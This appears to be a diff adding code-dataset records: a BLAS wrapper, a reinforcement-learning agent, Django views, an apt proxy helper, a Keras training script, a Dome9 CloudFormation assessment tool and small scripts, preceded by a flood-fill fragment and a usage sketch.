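    for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):
        nx, ny = x + dx, y + dy
        if 0 <= nx < grid.shape[0] and 0 <= ny < grid.shape[1] \
                and grid[nx, ny] == AIR and not external[nx, ny]:
            external[nx, ny] = True
            queue.append((nx, ny))

assert not external[2, 2]  # the enclosed cell stays internal
```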
+{"seq_id":"943270","text":"\"\"\"\n\n Copyright (c) 2014-2015-2015, The University of Texas at Austin.\n All rights reserved.\n\n This file is part of BLASpy and is available under the 3-Clause\n BSD License, which can be found in the LICENSE file at the top-level\n directory or at http://opensource.org/licenses/BSD-3-Clause\n\n\"\"\"\n\nfrom ..helpers import (get_vector_dimensions, get_square_matrix_dimension, get_cblas_info,\n check_equal_sizes, create_zero_matrix, convert_uplo, ROW_MAJOR)\nfrom ctypes import c_int, POINTER\n\n\ndef syr2(x, y, A=None, uplo='u', alpha=1.0, lda=None, inc_x=1, inc_y=1):\n \"\"\"\n Perform a symmetric rank-2 update operation.\n\n A := A + alpha * x * y_T + alpha * y * x_T\n\n where alpha is a scalar, A is a symmetric matrix, and x and y are general column vectors.\n\n The uplo argument indicates whether the lower or upper triangle of A is to be referenced and\n updated by the operation.\n\n Vectors x and y can be passed in as either row or column vectors. If necessary, an implicit\n transposition occurs.\n\n If matrix A is not provided, a zero matrix of the appropriate size and type is created\n and returned. In such a case, lda is automatically set to the number of columns in the\n newly created matrix A.\n\n Args:\n x: 2D NumPy matrix or ndarray representing vector x\n y: 2D NumPy matrix or ndarray representing vector y\n\n --optional arguments--\n\n A: 2D NumPy matrix or ndarray representing matrix A\n < default is the zero matrix >\n uplo: 'u' if the upper triangle of A is to be used\n 'l' if the lower triangle of A is to be used\n < default is 'u' >\n alpha: scalar alpha\n < default is 1.0 >\n lda: leading dimension of A (must be >= # of cols in A)\n < default is the number of columns in A >\n inc_x: stride of x (increment for the elements of x)\n < default is 1 >\n inc_y: stride of y (increment for the elements of y)\n < default is 1 >\n\n Returns:\n Matrix A (which is also overwritten)\n\n Raises:\n ValueError: if any of the following conditions occur:\n - A, x, or y is not a 2D NumPy ndarray or NumPy matrix\n - A, x, and y do not have the same dtype or that dtype is not supported\n - x or y is not a vector\n - the effective length of either x or y does not conform to the dimensions of A\n - uplo is not equal to one of the following: 'u', 'U', 'l', 'L'\n \"\"\"\n\n # get the dimensions of the parameters\n m_x, n_x, x_length = get_vector_dimensions('x', x, inc_x)\n m_y, n_y, y_length = get_vector_dimensions('y', y, inc_y)\n\n # if no matrix A is given, create a zero matrix of appropriate size with the same dtype as x\n if A is None:\n A = create_zero_matrix(x_length, x_length, x.dtype, type(x))\n lda = None\n\n # continue getting dimensions of the parameters\n dim_A = get_square_matrix_dimension('A', A)\n\n # assign a default value to lda if necessary (assumes row-major order)\n if lda is None:\n lda = dim_A\n\n # ensure the parameters are appropriate for the operation\n check_equal_sizes('A', dim_A, 'x', x_length)\n check_equal_sizes('A', dim_A, 'y', y_length)\n\n # convert to appropriate CBLAS value\n cblas_uplo = convert_uplo(uplo)\n\n # determine which CBLAS subroutine to call and which ctypes data type to use\n cblas_func, data_type = get_cblas_info('syr2', (A.dtype, x.dtype, y.dtype))\n\n # create a ctypes POINTER for each vector and matrix\n ctype_x = POINTER(data_type * n_x * m_x)\n ctype_y = POINTER(data_type * n_y * m_y)\n ctype_A = POINTER(data_type * dim_A * dim_A)\n\n # call CBLAS using ctypes\n cblas_func.argtypes = [c_int, c_int, c_int, 
data_type, ctype_x, c_int, ctype_y, c_int,\n ctype_A, c_int]\n cblas_func.restype = None\n cblas_func(ROW_MAJOR, cblas_uplo, dim_A, alpha, x.ctypes.data_as(ctype_x), inc_x,\n y.ctypes.data_as(ctype_y), inc_y, A.ctypes.data_as(ctype_A), lda)\n\n return A # A is also overwritten, so only useful if no A was provided","sub_path":"blaspy/level_2/syr2.py","file_name":"syr2.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
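A usage sketch following the routine's own docstring: x and y are passed as 2D column vectors, and with A omitted a zero matrix is created internally, so the result should equal alpha * (x y^T + y x^T) with only the requested triangle guaranteed to be filled:

```python
import numpy as np
# assumes BLASpy is installed, e.g.:  from blaspy import syr2

x = np.array([[1.0], [2.0], [3.0]])
y = np.array([[4.0], [5.0], [6.0]])

A = syr2(x, y, uplo='u')        # zero A created internally; upper triangle referenced

expected = x @ y.T + y @ x.T    # reference result computed directly
assert np.allclose(np.triu(A), np.triu(expected))
```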
+{"seq_id":"487032786","text":"import sys\nimport os\n\nfolder = sys.argv[1]\nfiles = os.listdir(folder)\ngroups = [\"first\", \"second\", \"third\"]\ncounter = -1\ndivider = len(files) / 3 + 1\nfor file in files:\n\tif os.path.isdir(folder + \"/\" + file):\n\t\tcontinue\n\tcounter += 1\n\twith open(folder + \"/\" + file) as f:\n\t\tlines = f.readlines()\n\t\tlines = [x.strip() for x in lines]\n\t\tfolderName = groups[counter / divider]\n\t\tif not os.path.exists(folder + \"/\" + folderName):\n\t\t\tos.makedirs(folder + \"/\" + folderName)\n\t\tcount = 0\n\t\tfor line in lines:\n\t\t\tif line.split(\",\")[0] == 'id':\n\t\t\t\tcount = 1\n\t\t\t\tfilename = line.split(\",\")[1]\n\t\t\telif count == 0:\n\t\t\t\tbreak\n\t\t\twith open(folder + \"/\" + folderName + \"/\" + filename, 'a+') as tempFile:\n\t\t\t\ttempFile.write(line + \"\\n\");","sub_path":"DataScripts/downloadScripts/splitPlaysByGames.py","file_name":"splitPlaysByGames.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"579399965","text":"\"\"\"\nTHis is the DQN file for Tetris AI\n\"\"\"\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nimport numpy as np\nimport cpprb\n\n\nnp.random.seed(0)\n\nclass Network(nn.Module):\n def __init__(self, alpha, inputShape, numActions):\n super().__init__()\n self.inputShape = inputShape\n self.numActions = numActions\n self.fc1Dims = 1024\n self.fc2Dims = 512\n\n self.fc1 = nn.Linear(*self.inputShape, self.fc1Dims)\n self.fc2 = nn.Linear(self.fc1Dims, self.fc2Dims)\n self.fc3 = nn.Linear(self.fc2Dims, numActions)\n\n self.optimizer = optim.Adam(self.parameters(), lr=alpha)\n self.loss = nn.MSELoss()\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n # self.device = T.device(\"cpu\")\n self.to(self.device)\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n x = self.fc3(x)\n\n return x\n\nclass Agent():\n def __init__(self, lr, input_shape, n_actions, eps_dec=0.001, eps_min=0.001, reward_shape=2):\n self.lr = lr\n self.gamma = 0.99\n self.reward_shape = reward_shape\n self.input_shape = input_shape\n self.n_actions = n_actions\n self.surprise = 0.5\n\n self.learn_cntr = 0\n self.replace = 100\n\n self.eps = 1\n self.eps_dec = eps_dec\n self.eps_min = eps_min\n\n self.model = Network(lr, self.input_shape, self.n_actions)\n self.target = Network(lr, self.input_shape, self.n_actions)\n self.memory = cpprb.ReplayBuffer(1_000_000,{\"obs\": {\"shape\": self.input_shape},\n \"act\": {\"shape\": 1},\n \"rew\": {},\n \"next_obs\": {\"shape\": self.input_shape},\n \"done\": {},\n })\n\n\n def choose_action(self, state):\n if np.random.random() > self.eps:\n state = torch.Tensor(state).to(self.model.device)\n states = state.unsqueeze(0)\n actions = self.model(states)\n action = torch.argmax(actions).item()\n else:\n action = np.random.choice([i for i in range(self.n_actions)])\n\n return action\n\n def replace_ntwrk(self):\n self.target.load_state_dict(self.model.state_dict())\n\n def learn(self, batchSize):\n if self.memory.memCount < batchSize:\n return\n\n self.model.optimizer.zero_grad()\n\n if self.learn_cntr % self.replace == 0:\n self.replace_ntwrk()\n\n state, action, reward, state_, done, players = self.memory.sample(batchSize)\n\n states = torch.Tensor(state).to(torch.float32 ).to(self.model.device)\n actions = torch.Tensor(action).to(torch.int64 ).to(self.model.device)\n rewards = torch.Tensor(reward).to(torch.float32 ).to(self.model.device)\n states_ = torch.Tensor(state_).to(torch.float32 ).to(self.model.device)\n dones = torch.Tensor(done).to(torch.bool ).to(self.model.device)\n\n batch_indices = np.arange(batchSize, dtype=np.int64)\n qValue = self.model(states, players)[batch_indices, actions]\n\n qValues_ = self.target(states_)\n qValue_ = torch.max(qValues_, dim=1)[0]\n qValue_[dones] = 0.0\n\n td = rewards + self.gamma * qValue_\n loss = self.model.loss(td, qValue)\n loss.backward()\n self.model.optimizer.step()\n\n # PER\n error = td - qValue\n\n\n self.eps -= self.eps_dec\n if self.eps < self.eps_min:\n self.eps = self.eps_min\n\n self.learn_cntr += 1\n","sub_path":"DQN.py","file_name":"DQN.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"291386892","text":"from functools import reduce\nfrom django.views.generic.list import ListView\nfrom django.views.generic.detail import DetailView\nfrom apps.sites.models import Site\n\n\nclass SitesView(ListView):\n model = Site\n template_name = 'sites.html'\n\n def render_to_response(self, context, **response_kwargs):\n response_kwargs.setdefault('content_type', self.content_type)\n context.update({'sites': Site.objects.all(),\n 'active': 'sites'})\n return self.response_class(\n request=self.request,\n template=self.get_template_names(),\n context=context,\n using=self.template_engine,\n **response_kwargs\n )\n\n\nclass SiteDetailView(DetailView):\n model = Site\n pk_url_kwarg = 'site_id'\n template_name = 'site.html'\n\n def get(self, request, *args, **kwargs):\n self.object = self.get_object()\n context = self.get_context_data(object=self.object)\n context.update({'active': 'sites'})\n return self.render_to_response(context)\n\n\nclass SummaryView(ListView):\n model = Site\n template_name = 'summary.html'\n\n def render_to_response(self, context, **response_kwargs):\n context.update({'active': 'summary'})\n\n for i in context['object_list']:\n a_value = reduce(lambda x, y: x + y, [i.a_value for i in i.values.all()])\n b_value = reduce(lambda x, y: x + y, [i.b_value for i in i.values.all()])\n\n setattr(i, 'a_value', a_value)\n setattr(i, 'b_value', b_value)\n\n response_kwargs.setdefault('content_type', self.content_type)\n return self.response_class(\n request=self.request,\n template=self.get_template_names(),\n context=context,\n using=self.template_engine,\n **response_kwargs\n )\n\n\nclass SummaryAverageView(ListView):\n model = Site\n template_name = 'summary.html'\n\n def render_to_response(self, context, **response_kwargs):\n context.update({'active': 'average'})\n\n for i in context['object_list']:\n total_values = len(i.values.all())\n a_value = reduce(lambda x, y: x + y, [i.a_value for i in i.values.all()])\n b_value = reduce(lambda x, y: x + y, [i.b_value for i in i.values.all()])\n\n a_value /= total_values\n b_value /= total_values\n\n setattr(i, 'a_value', a_value)\n setattr(i, 'b_value', b_value)\n\n response_kwargs.setdefault('content_type', self.content_type)\n return self.response_class(\n request=self.request,\n template=self.get_template_names(),\n context=context,\n using=self.template_engine,\n **response_kwargs\n )\n","sub_path":"apps/sites/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"373917445","text":"#!/usr/bin/env python2.7\n# -*- mode: python; encoding: utf-8; -*-\n\"\"\".\n\nXXX: This code is shared with apt-config-tool.\n\"\"\"\nfrom __future__ import division, absolute_import, unicode_literals, print_function\nfrom future_builtins import *\n\nimport logging\nimport subprocess\n\nfrom intensional import Re\n\n\nlog = logging.getLogger('apt-config-tool')\n\n\ndef parse_apt_config(dump):\n for line in dump.splitlines():\n if line not in Re(r'^([^ ]+) \"(.*)\";$'):\n raise AssertionError('Horrible parsing code has horribly failed!')\n yield (Re._[1], Re._[2])\n\n\ndef get_apt_config():\n return dict(parse_apt_config(subprocess.check_output(('apt-config', 'dump'))))\n\n\ndef get_apt_proxy():\n config = get_apt_config()\n\n proxy = config.get('Acquire::http::Proxy')\n if proxy:\n log.debug('Using host\\'s apt proxy: {}'.format(proxy))\n return proxy\n\n # You can install squid-deb-proxy-client, which supplies a tiny little script that asks avahi\n # for any zeroconf-advertised apt proxies.\n proxy_autodetect = config.get('Acquire::http::ProxyAutoDetect')\n if proxy_autodetect:\n log.debug('Using host\\'s apt proxy autodetection script: {}'.format(proxy_autodetect))\n proxy = subprocess.check_output((proxy_autodetect,)).strip()\n if proxy:\n log.debug('Autodetected apt proxy: {}'.format(proxy))\n return proxy\n\n log.debug('Couldn\\'t find an apt proxy.')\n return None\n","sub_path":"docker_debuild/apt_proxy_utils.py","file_name":"apt_proxy_utils.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"115276597","text":"from keras.metrics import *\nfrom keras.layers import *\nfrom keras.models import *\nfrom keras.callbacks import *\nfrom keras.optimizers import *\nfrom keras.preprocessing.image import ImageDataGenerator\n\n# dimensions of our images.\nimg_width, img_height = 128, 128\n\ntrain_data_dir = 'data/train'\nvalidation_data_dir = 'data/validation'\nnb_train_samples = 435130\nnb_validation_samples = 24426\nepochs = 50\nbatch_size = 64\n\n# changez le nom à chaque fois svp ↓\nexperiment_name = \"INATURALIST_E500_D512_C16.3.3_Lr0.01_Relu\"\ntb_callback = TensorBoard(\"./logs/\" + experiment_name, )\n\nprint(\"Model training will start soon\")\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, img_width, img_height)\nelse:\n input_shape = (img_width, img_height, 3)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(16, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(16, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(8142))\nmodel.add(Activation('softmax'))\n\nsgd = optimizers.SGD(lr=0.1, decay=1e-6, momentum=0.9, nesterov=True)\n\n# model.compile(loss='binary_crossentropy',\n# optimizer='rmsprop',\n# metrics=['accuracy'])\n\n\n# model.compile(sgd, mse, metrics=['categorical_accuracy'])\nmodel.compile(sgd, loss='categorical_crossentropy', metrics=['accuracy'])\n\n# this is the augmentation configuration we will use for training\ntrain_datagen = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\n# this is the augmentation configuration we will use for testing:\n# only rescaling\ntest_datagen = ImageDataGenerator(rescale=1. / 255)\n\ntrain_generator = train_datagen.flow_from_directory(\n train_data_dir,\n\n target_size=(img_width, img_height),\n batch_size=batch_size, shuffle=True, seed=None,\n class_mode='categorical',\n interpolation='nearest')\n\nvalidation_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size, shuffle=True, seed=None,\n class_mode='categorical',\n interpolation='nearest')\n\nmodel.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples // batch_size,\n epochs=epochs,\n callbacks=[tb_callback],\n validation_data=validation_generator,\n validation_steps=nb_validation_samples // batch_size)\n\nmodel.save_weights('first_try.h5')\n","sub_path":"models/conv2d.py","file_name":"conv2d.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"429368635","text":"# 3rd party libraries\nimport boto3 # $ pip install boto3\nimport requests # $ pip install requests\n\n# python standard libraries\nimport json\nimport csv\nimport argparse\nimport datetime\nimport os\n\nt0 = datetime.datetime.utcnow()\ntotal_sec = 0\nAPIVersion=1.01\n\n\nclass FailedEntity:\n def __init__(self):\n self.entity_id = None\n self.arn = None\n self.name = None\n self.tags = None\n self.type = None\n\n def set_entity_id(self, entity_id):\n self.entity_id = entity_id\n\n def set_arn(self, arn):\n self.arn = arn\n\n def set_name(self, name):\n self.name = name\n\n def set_tags(self, tags):\n self.tags = tags\n\n def set_type(self, type):\n self.type = type\n\n def __str__(self):\n rep = \"\\t\\t\\tEntity:\\n\"\n rep += ''.join(filter(None, [\"\\t\\t\\ttype: \", self.type, \"\\n\"]))\n rep += ''.join(filter(None, [\"\\t\\t\\tname: \", self.name, \"\\n\"]))\n rep += ''.join(filter(None, [\"\\t\\t\\tid: \", self.entity_id, \"\\n\"]))\n # rep += ''.join(filter(None, [\"\\t\\t\\tarn: \", self.arn, \"\\n\"]))\n\n return rep\n\n\nclass FailedTest:\n def __init__(self):\n self.rule_name = None\n self.rule_desc = None\n self.rule_severity = None\n\n def set_rule_name(self, rule_name):\n self.rule_name = rule_name\n\n def set_rule_desc(self, rule_desc):\n self.rule_desc = rule_desc\n\n def set_rule_severity(self, rule_severity):\n self.rule_severity = rule_severity\n\n def __str__(self):\n rep = \"\\tTest:\\n\"\n rep += \"\\t\\trule name: \" + self.rule_name + \"\\n\"\n rep += \"\\t\\tseverity: \" + self.rule_severity + \"\\n\"\n # rep += \"\\t\\tdescription: \" + self.rule_desc + \"\\n\"\n\n return rep\n\n\ndef run_assessment(bundle_id, aws_cloud_account, d9_secret, d9_key, region, d9_cloud_account=\"\", maxTimeoutMinutes=10):\n\n global t0,total_sec\n t0_run_assessment = datetime.datetime.utcnow()\n t0 = datetime.datetime.utcnow()\n d9region = region.replace('-', '_') # dome9 identifies regions with underscores\n print(\"\\n Dome9 Run Assessment Interface Version - {}\".format(APIVersion))\n print(\"\\n\" + \"*\" * 50 + \"\\nStarting Assessment Execution\\n\" + \"*\" * 50)\n d9_id = \"\"\n # Need to get the Dome9 cloud account representation\n if d9_cloud_account == \"\":\n print('\\nResolving Dome9 account id from aws account number: {}'.format(aws_cloud_account))\n r = requests.get('https://api.dome9.com/v2/cloudaccounts/{}'.format(aws_cloud_account),\n auth=(d9_key, d9_secret))\n r.raise_for_status()\n d9_id = r.json()['id']\n print('Found it. 
Dome9 cloud account Id={}'.format(d9_id))\n\n headers = {\n 'Content-Type': 'application/json',\n 'Accept': 'application/json'\n }\n\n body = {\n \"id\": bundle_id,\n \"cloudAccountId\": d9_id,\n \"region\": d9region,\n \"cloudAccountType\": \"Aws\"\n }\n\n r = requests.post('https://api.dome9.com/v2/assessment/bundleV2', data=json.dumps(body), headers=headers,\n auth=(d9_key, d9_secret))\n r.raise_for_status()\n tn = datetime.datetime.utcnow()\n\n #check that max timeout was not reached\n if checkThatMaxTimeWasNotReached(t0, maxTimeoutMinutes):\n return\n\n total_sec = total_sec + (tn - t0).total_seconds()\n\n print(\"\\n\" + \"*\" * 50 + \"\\nAssessment Execution Done in {} seconds \\n\".format((tn - t0_run_assessment).total_seconds()) + \"*\" * 50)\n\n return r.json()\n\n\n# Analyze the assessment execution result and return the assets id and types for all the assets the fail in\n# each rule execution\n\ndef print_map(failed_Test_relevant_entites_map):\n for test in failed_Test_relevant_entites_map:\n print(test)\n print(\"\\n\\t\\tFailed Entities:\\n\")\n for entity in failed_Test_relevant_entites_map[test]:\n print(entity)\n\n\ndef checkThatMaxTimeWasNotReached (t0, maxTimeoutMinutes):\n tNow = datetime.datetime.utcnow()\n elapsed = (tNow - t0).total_seconds()\n print('\\nCurrent run time of d9 assessment execution and analyzing is - {} Seconds\\n'.format(elapsed))\n if elapsed > maxTimeoutMinutes * 60:\n print('\\nStopping script, passed maxTimeoutMinutes ({})'.format(maxTimeoutMinutes))\n return True\n return False\n\ndef analyze_assessment_result(assessment_result, aws_cloud_account, region, stack_name, aws_profile='', print_flag=True, maxTimeoutMinutes=10):\n global t0, total_sec\n t0_run_assessment_analyze = datetime.datetime.utcnow()\n\n # resource_physical_ids - its a list of the resource ids that related to the stack_name and supported by Dome9\n # The ids are from the cfn describe and based on the PhysicalResourceId field list_of_failed_entities - It's a\n # list of FailedEntity that will contain for each failed entities in the assessment result it's id,arn,name,tags\n print(\"\\n\" + \"*\" * 50 + \"\\nStarting To Analyze Assessment Result\\n\" + \"*\" * 50 + \"\\n\")\n (resource_physical_ids, filed_tests_map) = prepare_results_to_analyze(aws_cloud_account, region, stack_name,\n aws_profile, assessment_result)\n\n print(\"\\nBundle - {}\".format(assessment_result[\"request\"][\"name\"]))\n print(\"\\nNumber of total failed tests: {}\\n\".format(len(filed_tests_map)))\n print(\"\\nFailed Tests that are relevant to the Stack - {}:\\n\".format(stack_name))\n\n # add statistics about the assessment result and print the stuck name\n\n\n failed_test_relevant_entities_map = dict()\n for failed_test in filed_tests_map:\n fallback = True\n relevant_failed_entities = list()\n for failed_entity in filed_tests_map[failed_test]:\n # 1st check with the tags \"key\": \"aws:cloudformation:stack-name\" equals to our stack_name\n if failed_entity.tags:\n for tag in failed_entity.tags:\n if tag[\"key\"] == \"aws:cloudformation:stack-name\" and tag[\"value\"] == stack_name:\n relevant_failed_entities.append(failed_entity)\n fallback = False\n # 2nd if the entity doesn't have tags fall back to id\n if fallback and failed_entity.entity_id:\n if failed_entity.entity_id in resource_physical_ids:\n relevant_failed_entities.append(failed_entity)\n fallback = False\n # 3rd fall back to name\n if fallback and failed_entity.name:\n if failed_entity.name in resource_physical_ids:\n 
relevant_failed_entities.append(failed_entity)\n fallback = False\n # 4th fall back to arn\n if fallback and failed_entity.arn:\n if failed_entity.arn in resource_physical_ids:\n relevant_failed_entities.append(failed_entity)\n fallback = False\n\n if len(relevant_failed_entities) > 0:\n failed_test_relevant_entities_map[failed_test] = relevant_failed_entities\n if print_flag:\n print_map(failed_test_relevant_entities_map)\n\n #check that max timeout was not reached\n if checkThatMaxTimeWasNotReached(t0, maxTimeoutMinutes):\n return\n\n tn = datetime.datetime.utcnow()\n total_sec = total_sec + (tn - t0_run_assessment_analyze).total_seconds()\n print(\"\\n\" + \"*\" * 50 + \"\\nAssessment Analyzing Was Done in {} seconds\\n\".format((tn - t0_run_assessment_analyze).total_seconds()) + \"*\" * 50 + \"\\n\")\n\n return failed_test_relevant_entities_map\n\n\ndef prepare_results_to_analyze(aws_cloud_account, region, stack_name, aws_profile, assessment_result):\n # allow to specify specific profile, fallback to standard boto credentials lookup strategy\n # https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html\n aws_session = boto3.session.Session(profile_name=aws_profile,\n region_name=region) if aws_profile else boto3.session.Session(\n region_name=region)\n\n # sanity test - verify that we have credentials for the relevant AWS account numnber\n sts = aws_session.client('sts')\n account_id = sts.get_caller_identity()[\"Account\"]\n if (str(aws_cloud_account) != str(account_id)):\n print(aws_cloud_account)\n print(account_id)\n print(\n 'Error - the provided awsAccNumber ({}) is not tied to the AWS credentials of this script ({}) consider '\n 'providing a different \"profile\" argument'.format(\n aws_cloud_account, account_id))\n exit(2)\n\n cfn = aws_session.client('cloudformation')\n response_pages = list()\n api_response = cfn.list_stack_resources(\n StackName=stack_name,\n )\n\n # print(api_response)\n response_pages.append(api_response)\n while 'NextToken' in api_response:\n api_response = cfn.list_stack_resources(\n StackName=stack_name,\n NextToken=api_response['NextToken']\n )\n response_pages.append(api_response)\n\n # get dome9 types from mapping file\n MAPPINGS_PATH = \"%s/cfn_mappings.csv\" % (os.path.dirname(os.path.realpath(__file__)))\n cfn_mappings = dict()\n with open(MAPPINGS_PATH, \"r\") as f:\n reader = csv.DictReader(f)\n for item in reader:\n if item['Dome9']:\n cfn_mappings[item['CFN']] = item['Dome9'].split(',')\n\n # Prepare the set of physical resource ids for the relevant d9 supported resources from the stack\n resource_physical_ids = set() # set will make it unique\n for response in response_pages:\n for resource in response['StackResourceSummaries']:\n resource_type = resource['ResourceType']\n resource_physical_id = resource[\"PhysicalResourceId\"]\n if resource_type in cfn_mappings:\n resource_physical_ids.add(resource_physical_id)\n\n # Prepare full entity representation (id,arn,name) of each failed entity\n filed_tests_map = dict()\n\n # for all the failed tests\n for test in [tst for tst in assessment_result[\"tests\"] if not tst[\"testPassed\"]]:\n failed_test = FailedTest()\n list_of_failed_entities = list()\n failed_test.set_rule_name(test[\"rule\"][\"name\"])\n failed_test.set_rule_severity(test[\"rule\"][\"severity\"])\n failed_test.set_rule_desc(test[\"rule\"][\"description\"])\n\n filed_tests_map[failed_test] = None\n\n # for each failed asset\n for entity in [ast for ast in test[\"entityResults\"] if ast[\"isRelevant\"] and not 
ast[\"isValid\"]]:\n entity_type = entity['testObj']['entityType']\n entity_idx = entity['testObj'][\"entityIndex\"]\n if entity_idx >= 0:\n full_d9_entity = assessment_result[\"testEntities\"][entity_type][entity_idx]\n failed_entity = FailedEntity()\n failed_entity.set_type(entity_type)\n # print(full_d9_entity_json)\n if 'id' in full_d9_entity:\n failed_entity.set_entity_id(full_d9_entity[\"id\"])\n if 'arn' in full_d9_entity:\n failed_entity.set_arn(full_d9_entity[\"arn\"])\n if 'name' in full_d9_entity:\n failed_entity.set_name(full_d9_entity[\"name\"])\n if 'tags' in full_d9_entity:\n failed_entity.set_tags(full_d9_entity[\"tags\"])\n list_of_failed_entities.append(failed_entity)\n filed_tests_map[failed_test] = list_of_failed_entities\n\n return resource_physical_ids, filed_tests_map\n\n\ndef main():\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('--d9keyId', required=True, type=str)\n parser.add_argument('--d9secret', required=True, type=str)\n parser.add_argument('--awsCliProfile', required=False, type=str)\n parser.add_argument('--awsAccountNumber', required=True, type=str)\n parser.add_argument('--d9CloudAccount', required=False, type=str, default='')\n parser.add_argument('--region', required=True, type=str)\n parser.add_argument('--stackName', required=True, type=str)\n parser.add_argument('--bundleId', required=True, type=int)\n parser.add_argument('--maxTimeoutMinutes', required=False, type=int, default=10)\n args = parser.parse_args()\n # Take start time\n print(\"\\n\\n{}\\nStarting...\\n{}\\n\\nSetting now (UTC {}) \".format(80 * '*', 80 * '*', t0))\n\n result = run_assessment(bundle_id=args.bundleId, aws_cloud_account=args.awsAccountNumber,\n d9_secret=args.d9secret,\n d9_key=args.d9keyId, region=args.region, maxTimeoutMinutes=args.maxTimeoutMinutes)\n res = analyze_assessment_result(assessment_result=result, aws_cloud_account=args.awsAccountNumber,\n region=args.region,\n stack_name=args.stackName, aws_profile=args.awsCliProfile, maxTimeoutMinutes=args.maxTimeoutMinutes)\n\n print(\"\\n\" + \"*\" * 50 + \"\\nRun and analyzing Assessment Script ran for {} seconds\\n\".format(\n total_sec) + \"*\" * 50 + \"\\n\")\n return res\n\n\nif __name__ == \"__main__\":\n\n main()\n","sub_path":"Dome9 CI:CD Scripts Interface/d9_run_assessment.py","file_name":"d9_run_assessment.py","file_ext":"py","file_size_in_byte":13103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"516418046","text":"import random\ndinheiros = 1000\njogo = True\nwhile jogo:\n iniciar = input('Quer apostar? (sim/não): ')\n if iniciar == 'não':\n jogo = False\n else:\n dado1 = random.randint(1,6)\n dado2 = random.randint(1,6)\n sdados = dado1+dado2\n jogada = True\n valor_aposta = 30\n while jogada:\n dinheiros -= valor_aposta \n valor_aposta -= 10\n aposta = int(input('Qual o valor da soma?: '))\n if aposta == sdados:\n dinheiros += 50\n jogada = False\n else:\n if valor_aposta == 0:\n jogada = False\n else:\n pergunta = input('Quer continuar tentando ou vai desistir?: ')\n if pergunta == 'desistir':\n jogada = False\n print('Você terminou a partida com {0} dinheiros'.format(dinheiros))\n if dinheiros <= 0:\n jogo = False\n \n ","sub_path":"backup/user_202/ch141_2020_04_01_20_42_35_039384.py","file_name":"ch141_2020_04_01_20_42_35_039384.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"71666809","text":"\"\"\"This file houses the balance function and helper functions that\r\ncomes with it. \"\"\"\r\n\r\nimport country as c\r\nimport random\r\nfrom country import Country\r\nfrom operator import attrgetter\r\n\r\n\r\ndef find_negative_country(curr_country: Country) -> Country:\r\n temp_list = c.country_master_list\r\n temp_list.reverse\r\n for country in temp_list:\r\n if country.surplus() < 0:\r\n return country\r\n\r\n\r\ndef find_poor_country(curr_country: Country) -> Country:\r\n temp_master_list = c.country_master_list\r\n temp_master_list.sort(key=attrgetter(\"gdp\"))\r\n for country in temp_master_list:\r\n if country.surplus() < 2:\r\n return country\r\n\r\n\r\ndef test_total_vaccines():\r\n total = 0\r\n for country in c.country_master_list:\r\n total += country.num_vaccines\r\n return total\r\n\r\n\r\ndef new_bal() -> None:\r\n for country in c.country_master_list:\r\n value = country.surplus()\r\n if value > 0:\r\n if find_negative_country(country) is None:\r\n break\r\n else:\r\n for country2 in c.country_master_list:\r\n if country2.surplus() < 0:\r\n country.donate(country.surplus())\r\n country2.receive_donation(country.surplus())\r\n\r\n\r\ndef scaled_vaccine_nums(country: str) -> int:\r\n \"\"\"This function will return an approprite integer which represents the \r\n number of vaccines a country has\"\"\"\r\n\r\n country2 = c.find_country(c.country_master_list, country)\r\n return random.randint(int(country2.num_pop-country2.num_pop*0.25), int(country2.num_pop+country2.num_pop*0.10))\r\n\r\n","sub_path":"balance_distributions.py","file_name":"balance_distributions.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
